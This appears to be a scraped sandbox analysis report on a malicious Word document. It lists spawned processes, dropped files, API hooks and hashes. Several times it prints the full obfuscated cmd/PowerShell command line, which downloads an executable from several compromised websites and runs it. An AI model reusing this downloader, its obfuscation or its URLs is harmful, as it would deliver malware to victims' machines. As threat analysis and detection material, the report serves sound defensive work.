%mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))"), Spawned process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Show Process), Spawned process "166520.exe" (Show Process), Spawned process "cosineinit.exe" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"~$vPLpWc.doc" has type "data"
"166520.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"02vPLpWc.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu May 17 07:53:26 2018 mtime=Thu May 17 07:53:26 2018 atime=Thu May 17 07:53:56 2018 length=167424 window=hide"
"index.dat" has type "data"
"~WRS{3B257DFB-1EFD-4832-9438-0BDD960DE59D}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"TY98LM19OS4MQAMZCOLL.temp" has type "data"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9U"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Heuristic match: "ifcingenieria.cl" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "b800000000663d33c0bae405350068dcf52f6cc3" to virtual address "0x0442D814"
"WINWORD.EXE" wrote bytes "b811110000663d33c0ba7c03440468dcf52f6cc3" to virtual address "0x0442D7F4"
"WINWORD.EXE" wrote bytes "135c4f08" to virtual address "0x64B40BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "e93655aded" to virtual address "0x76E53EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e99e48d6ee" to virtual address "0x75B83D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2405350068dcf52f6cc3" to virtual address "0x0442D7B4"
"WINWORD.EXE" wrote bytes "ff477d09" to virtual address "0x6C7F9904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "c4cab77580bbb775aa6eb8759fbbb77508bbb77546ceb7756138b875de2fb875d0d9b77500000000177930774f9130777f6f3077f4f7307711f73077f2833077857e307700000000" to virtual address "0x6EF81000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "cdba0006" to virtual address "0x2F2C1B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "baf41b4404b98b7b2f6cffe1" to virtual address "0x003614E2"
"WINWORD.EXE" wrote bytes "a1f82708" to virtual address "0x69C6F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba2406350068dcf52f6cc3" to virtual address "0x0442D834"
"WINWORD.EXE" wrote bytes "bae4d43d00b98b7b2f6cffe1" to virtual address "0x00360A06"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba6405350068dcf52f6cc3" to virtual address "0x0442D7D4"
"WINWORD.EXE" wrote bytes "ba28874204b98b7b2f6cffe1" to virtual address "0x0036038E"
"WINWORD.EXE" wrote bytes "ba28bc3d00b98b7b2f6cffe1" to virtual address "0x0036150A"
"WINWORD.EXE" wrote bytes "b800000000663d33c0bae404350068dcf52f6cc3" to virtual address "0x0442D794"
"WINWORD.EXE" wrote bytes "e9c53252ee" to virtual address "0x769A6143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "afe16309" to virtual address "0x6C9010AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "2da12708" to virtual address "0x65B478E4" (part of module "OART.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Installs hooks/patches the running process
File Details
All Details:
02vPLpWc
- Filename
- 02vPLpWc
- Size
- 164KiB (167424 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: SHaevaecyvesho12012, Subject: SHaevaecy96784, Author: SHaevae71615, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 08:45:00 2018, Last Saved Time/Date: Thu May 17 08:45:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- 2ff15b6627b14bd38a942955121c07ecaefcad830bc952dad87e01a3aa2cf2da
- MD5
- 021fc965d607b23622da10d996c90adf
- SHA1
- 04ea87b8ebdb4f09e114bb0985e4b91f30eae422
Resources
- Icon
-
Visualization
- Input File (PortEx)
-
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 5 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\02vPLpWc.doc"
(PID: 3952)
-
cmd.exe
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
(PID: 2952, Additional Context: Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124)))
-
powershell.exe
powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 